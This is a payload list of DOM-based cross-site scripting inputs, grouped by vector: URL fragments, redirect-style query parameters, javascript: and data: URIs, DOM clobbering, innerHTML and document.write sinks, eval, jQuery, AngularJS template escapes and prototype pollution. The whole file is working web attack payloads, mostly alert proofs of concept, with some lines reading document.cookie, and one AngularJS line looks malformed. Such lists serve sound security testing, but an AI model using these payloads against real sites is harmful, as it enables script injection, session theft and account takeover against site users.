# DOM XSS Payloads

# ========== URL Fragment (location.hash) ==========
#<script>alert(1)</script>
#"><script>alert(1)</script>
#<img src=x onerror=alert(1)>
#javascript:alert(1)
#'-alert(1)-'
#</script><script>alert(1)</script>

# ========== 常见参数 ==========
?q=<script>alert(1)</script>
?search=<img src=x onerror=alert(1)>
?redirect=javascript:alert(1)
?url=javascript:alert(1)
?next=javascript:alert(1)
?return=javascript:alert(1)
?callback=javascript:alert(1)
?returnUrl=javascript:alert(1)
?goto=javascript:alert(1)
?target=javascript:alert(1)
?rurl=javascript:alert(1)
?dest=javascript:alert(1)
?destination=javascript:alert(1)
?redir=javascript:alert(1)
?redirect_uri=javascript:alert(1)
?redirect_url=javascript:alert(1)
?out=javascript:alert(1)
?view=javascript:alert(1)
?to=javascript:alert(1)
?image_url=javascript:alert(1)
?link=javascript:alert(1)
?src=javascript:alert(1)
?file=javascript:alert(1)
?page=javascript:alert(1)
?feed=javascript:alert(1)
?host=javascript:alert(1)
?site=javascript:alert(1)
?html=javascript:alert(1)

# ========== JavaScript Sink ==========
javascript:alert(document.domain)//
javascript:alert(document.cookie)//
javascript:/**/alert(1)//
javascript://%0aalert(1)
javascript://comment%0aalert(1)
javascript:'-alert(1)-'

# ========== Data URI ==========
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:image/svg+xml,<svg onload=alert(1)>
data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

# ========== DOM Clobbering ==========
<form id=x><input id=y></form><script>alert(x.y)</script>
<img name=x><img id=y name=x><script>alert(x.y)</script>
<form id=location href=javascript:alert(1)>
<a id=__proto__><a id=__proto__ name=href href=javascript:alert(1)>
<input id=attributes><input id=attributes name=href href=javascript:alert(1)>

# ========== innerHTML/outerHTML ==========
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<embed src=javascript:alert(1)>

# ========== document.write ==========
<script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>

# ========== eval/setTimeout/setInterval ==========
alert(1)
alert`1`
(alert)(1)
[].constructor.constructor('alert(1)')()
Function('alert(1)')()

# ========== jQuery Sink ==========
<img src=x onerror=alert(1)>
<div onmouseover=alert(1)>hover</div>
<a href=javascript:alert(1)>click</a>

# ========== AngularJS ==========
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{a]a]a]a]a]a]constructor.constructor('alert(1)')()}}

# ========== Prototype Pollution ==========
__proto__[innerHTML]=<img src=x onerror=alert(1)>
constructor[prototype][innerHTML]=<img src=x onerror=alert(1)>
?__proto__[test]=test
?constructor[prototype][test]=test
